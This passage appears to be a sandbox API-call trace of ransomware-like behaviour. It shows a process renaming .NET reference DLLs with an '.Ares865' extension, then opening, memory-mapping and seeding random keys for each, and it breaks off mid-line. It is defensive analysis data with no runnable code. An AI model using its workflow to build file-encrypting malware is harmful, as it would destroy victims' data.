lstrcmpiW (lpString1="System.Data.Services.dll", lpString2=".dll") returned 1 [0123.688] lstrlenW (lpString=".lnk") returned 4 [0123.688] lstrcmpiW (lpString1="System.Data.Services.dll", lpString2=".lnk") returned 1 [0123.688] lstrlenW (lpString=".ini") returned 4 [0123.688] lstrcmpiW (lpString1="System.Data.Services.dll", lpString2=".ini") returned 1 [0123.688] lstrlenW (lpString=".sys") returned 4 [0123.688] lstrcmpiW (lpString1="System.Data.Services.dll", lpString2=".sys") returned 1 [0123.688] lstrlenW (lpString="System.Data.Services.dll") returned 24 [0123.689] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll.Ares865") returned 101 [0123.689] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.dll.ares865"), dwFlags=0x1) returned 1 [0123.691] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.691] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=692224) returned 1 [0123.691] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.692] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.692] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.692] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa9300, lpName=0x0) returned 0x170 [0123.695] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa9300) returned 0xdd0000 [0123.757] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.758] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.758] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.768] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.DirectoryServices.AccountManagement.dll" | out: lpString1="System.DirectoryServices.AccountManagement.dll") returned="System.DirectoryServices.AccountManagement.dll" [0123.768] lstrlenW (lpString="System.DirectoryServices.AccountManagement.dll") returned 46 [0123.768] lstrlenW (lpString="Ares865") returned 7 [0123.768] lstrcmpiW (lpString1="ent.dll", lpString2="Ares865") returned 1 [0123.768] lstrlenW (lpString=".dll") returned 4 [0123.768] lstrcmpiW (lpString1="System.DirectoryServices.AccountManagement.dll", lpString2=".dll") returned 1 [0123.768] lstrlenW (lpString=".lnk") returned 4 [0123.768] lstrcmpiW (lpString1="System.DirectoryServices.AccountManagement.dll", lpString2=".lnk") returned 1 [0123.768] lstrlenW (lpString=".ini") returned 4 [0123.768] lstrcmpiW (lpString1="System.DirectoryServices.AccountManagement.dll", lpString2=".ini") returned 1 [0123.768] lstrlenW (lpString=".sys") returned 4 [0123.768] lstrcmpiW (lpString1="System.DirectoryServices.AccountManagement.dll", lpString2=".sys") returned 1 [0123.768] lstrlenW (lpString="System.DirectoryServices.AccountManagement.dll") returned 46 [0123.768] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll.Ares865") returned 123 [0123.768] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.directoryservices.accountmanagement.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.directoryservices.accountmanagement.dll.ares865"), dwFlags=0x1) returned 1 [0123.779] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.directoryservices.accountmanagement.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.779] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=290816) returned 1 [0123.780] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.782] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.782] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.782] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x47300, lpName=0x0) returned 0x170 [0123.784] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x47300) returned 0x420000 [0123.813] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.814] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.814] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.819] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Management.Instrumentation.dll" | out: lpString1="System.Management.Instrumentation.dll") returned="System.Management.Instrumentation.dll" [0123.819] lstrlenW (lpString="System.Management.Instrumentation.dll") returned 37 [0123.819] lstrlenW (lpString="Ares865") returned 7 [0123.819] lstrcmpiW (lpString1="ion.dll", lpString2="Ares865") returned 1 [0123.819] lstrlenW (lpString=".dll") returned 4 [0123.819] lstrcmpiW (lpString1="System.Management.Instrumentation.dll", lpString2=".dll") returned 1 [0123.819] lstrlenW (lpString=".lnk") returned 4 [0123.819] lstrcmpiW (lpString1="System.Management.Instrumentation.dll", lpString2=".lnk") returned 1 [0123.819] lstrlenW (lpString=".ini") returned 4 [0123.819] lstrcmpiW (lpString1="System.Management.Instrumentation.dll", lpString2=".ini") returned 1 [0123.819] lstrlenW (lpString=".sys") returned 4 [0123.819] lstrcmpiW (lpString1="System.Management.Instrumentation.dll", lpString2=".sys") returned 1 [0123.819] lstrlenW (lpString="System.Management.Instrumentation.dll") returned 37 [0123.819] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll.Ares865") returned 114 [0123.819] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.management.instrumentation.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.management.instrumentation.dll.ares865"), dwFlags=0x1) returned 1 [0123.822] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.management.instrumentation.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.822] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=143360) returned 1 [0123.822] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.823] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.823] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.824] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x23300, lpName=0x0) returned 0x170 [0123.825] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x23300) returned 0x420000 [0123.845] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.845] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.846] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.848] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Net.dll" | out: lpString1="System.Net.dll") returned="System.Net.dll" [0123.848] lstrlenW (lpString="System.Net.dll") returned 14 [0123.848] lstrlenW (lpString="Ares865") returned 7 [0123.848] lstrcmpiW (lpString1="Net.dll", lpString2="Ares865") returned 1 [0123.848] lstrlenW (lpString=".dll") returned 4 [0123.848] lstrcmpiW (lpString1="System.Net.dll", lpString2=".dll") returned 1 [0123.848] lstrlenW (lpString=".lnk") returned 4 [0123.848] lstrcmpiW (lpString1="System.Net.dll", lpString2=".lnk") returned 1 [0123.848] lstrlenW (lpString=".ini") returned 4 [0123.848] lstrcmpiW (lpString1="System.Net.dll", lpString2=".ini") returned 1 [0123.848] lstrlenW (lpString=".sys") returned 4 [0123.848] lstrcmpiW (lpString1="System.Net.dll", lpString2=".sys") returned 1 [0123.848] lstrlenW (lpString="System.Net.dll") returned 14 [0123.849] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll.Ares865") returned 91 [0123.849] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.net.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.net.dll.ares865"), dwFlags=0x1) returned 1 [0123.851] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.net.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.851] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=237568) returned 1 [0123.852] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.852] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.852] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.853] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3a300, lpName=0x0) returned 0x170 [0123.857] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3a300) returned 0x420000 [0123.912] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.913] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.913] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.916] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.ServiceModel.Web.dll" | out: lpString1="System.ServiceModel.Web.dll") returned="System.ServiceModel.Web.dll" [0123.916] lstrlenW (lpString="System.ServiceModel.Web.dll") returned 27 [0123.916] lstrlenW (lpString="Ares865") returned 7 [0123.917] lstrcmpiW (lpString1="Web.dll", lpString2="Ares865") returned 1 [0123.917] lstrlenW (lpString=".dll") returned 4 [0123.917] lstrcmpiW (lpString1="System.ServiceModel.Web.dll", lpString2=".dll") returned 1 [0123.917] lstrlenW (lpString=".lnk") returned 4 [0123.917] lstrcmpiW (lpString1="System.ServiceModel.Web.dll", lpString2=".lnk") returned 1 [0123.917] lstrlenW (lpString=".ini") returned 4 [0123.917] lstrcmpiW (lpString1="System.ServiceModel.Web.dll", lpString2=".ini") returned 1 [0123.917] lstrlenW (lpString=".sys") returned 4 [0123.917] lstrcmpiW (lpString1="System.ServiceModel.Web.dll", lpString2=".sys") returned 1 [0123.917] lstrlenW (lpString="System.ServiceModel.Web.dll") returned 27 [0123.917] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll.Ares865") returned 104 [0123.917] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.servicemodel.web.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.servicemodel.web.dll.ares865"), dwFlags=0x1) returned 1 [0123.920] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.servicemodel.web.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.920] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=569344) returned 1 [0123.920] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.921] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.921] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.921] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8b300, lpName=0x0) returned 0x170 [0123.923] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8b300) returned 0x420000 [0123.982] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.983] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.983] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.991] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Web.Abstractions.dll" | out: lpString1="System.Web.Abstractions.dll") returned="System.Web.Abstractions.dll" [0123.991] lstrlenW (lpString="System.Web.Abstractions.dll") returned 27 [0123.991] lstrlenW (lpString="Ares865") returned 7 [0123.991] lstrcmpiW (lpString1="ons.dll", lpString2="Ares865") returned 1 [0123.991] lstrlenW (lpString=".dll") returned 4 [0123.991] lstrcmpiW (lpString1="System.Web.Abstractions.dll", lpString2=".dll") returned 1 [0123.991] lstrlenW (lpString=".lnk") returned 4 [0123.991] lstrcmpiW (lpString1="System.Web.Abstractions.dll", lpString2=".lnk") returned 1 [0123.991] lstrlenW (lpString=".ini") returned 4 [0123.991] lstrcmpiW (lpString1="System.Web.Abstractions.dll", lpString2=".ini") returned 1 [0123.991] lstrlenW (lpString=".sys") returned 4 [0123.991] lstrcmpiW (lpString1="System.Web.Abstractions.dll", lpString2=".sys") returned 1 [0123.991] lstrlenW (lpString="System.Web.Abstractions.dll") returned 27 [0123.991] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll.Ares865") returned 104 [0123.991] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.abstractions.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.abstractions.dll.ares865"), dwFlags=0x1) returned 1 [0123.994] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.abstractions.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.994] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77824) returned 1 [0123.995] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.995] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.995] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.995] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13300, lpName=0x0) returned 0x170 [0123.997] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13300) returned 0x190000 [0124.001] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.002] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.002] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.006] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Web.DynamicData.Design.dll" | out: lpString1="System.Web.DynamicData.Design.dll") returned="System.Web.DynamicData.Design.dll" [0124.006] lstrlenW (lpString="System.Web.DynamicData.Design.dll") returned 33 [0124.006] lstrlenW (lpString="Ares865") returned 7 [0124.006] lstrcmpiW (lpString1="ign.dll", lpString2="Ares865") returned 1 [0124.006] lstrlenW (lpString=".dll") returned 4 [0124.006] lstrcmpiW (lpString1="System.Web.DynamicData.Design.dll", lpString2=".dll") returned 1 [0124.006] lstrlenW (lpString=".lnk") returned 4 [0124.006] lstrcmpiW (lpString1="System.Web.DynamicData.Design.dll", lpString2=".lnk") returned 1 [0124.006] lstrlenW (lpString=".ini") returned 4 [0124.006] lstrcmpiW (lpString1="System.Web.DynamicData.Design.dll", lpString2=".ini") returned 1 [0124.006] lstrlenW (lpString=".sys") returned 4 [0124.006] lstrcmpiW (lpString1="System.Web.DynamicData.Design.dll", lpString2=".sys") returned 1 [0124.006] lstrlenW (lpString="System.Web.DynamicData.Design.dll") returned 33 [0124.006] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll.Ares865") returned 110 [0124.006] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.dynamicdata.design.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.dynamicdata.design.dll.ares865"), dwFlags=0x1) returned 1 [0124.009] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.dynamicdata.design.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.009] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32768) returned 1 [0124.009] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.010] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.010] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.010] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8300, lpName=0x0) returned 0x170 [0124.012] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8300) returned 0x190000 [0124.014] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.014] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.014] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.015] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Web.DynamicData.dll" | out: lpString1="System.Web.DynamicData.dll") returned="System.Web.DynamicData.dll" [0124.015] lstrlenW (lpString="System.Web.DynamicData.dll") returned 26 [0124.015] lstrlenW (lpString="Ares865") returned 7 [0124.016] lstrcmpiW (lpString1="ata.dll", lpString2="Ares865") returned 1 [0124.016] lstrlenW (lpString=".dll") returned 4 [0124.016] lstrcmpiW (lpString1="System.Web.DynamicData.dll", lpString2=".dll") returned 1 [0124.016] lstrlenW (lpString=".lnk") returned 4 [0124.016] lstrcmpiW (lpString1="System.Web.DynamicData.dll", lpString2=".lnk") returned 1 [0124.016] lstrlenW (lpString=".ini") returned 4 [0124.016] lstrcmpiW (lpString1="System.Web.DynamicData.dll", lpString2=".ini") returned 1 [0124.016] lstrlenW (lpString=".sys") returned 4 [0124.016] lstrcmpiW (lpString1="System.Web.DynamicData.dll", lpString2=".sys") returned 1 [0124.016] lstrlenW (lpString="System.Web.DynamicData.dll") returned 26 [0124.016] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll.Ares865") returned 103 [0124.016] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.dynamicdata.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.dynamicdata.dll.ares865"), dwFlags=0x1) returned 1 [0124.018] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.dynamicdata.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.018] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=229376) returned 1 [0124.019] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.019] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.019] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.020] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x38300, lpName=0x0) returned 0x170 [0124.021] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x38300) returned 0x420000 [0124.032] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.033] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.033] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.036] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Web.Entity.Design.dll" | out: lpString1="System.Web.Entity.Design.dll") returned="System.Web.Entity.Design.dll" [0124.037] lstrlenW (lpString="System.Web.Entity.Design.dll") returned 28 [0124.037] lstrlenW (lpString="Ares865") returned 7 [0124.037] lstrcmpiW (lpString1="ign.dll", lpString2="Ares865") returned 1 [0124.037] lstrlenW (lpString=".dll") returned 4 [0124.037] lstrcmpiW (lpString1="System.Web.Entity.Design.dll", lpString2=".dll") returned 1 [0124.037] lstrlenW (lpString=".lnk") returned 4 [0124.037] lstrcmpiW (lpString1="System.Web.Entity.Design.dll", lpString2=".lnk") returned 1 [0124.037] lstrlenW (lpString=".ini") returned 4 [0124.037] lstrcmpiW 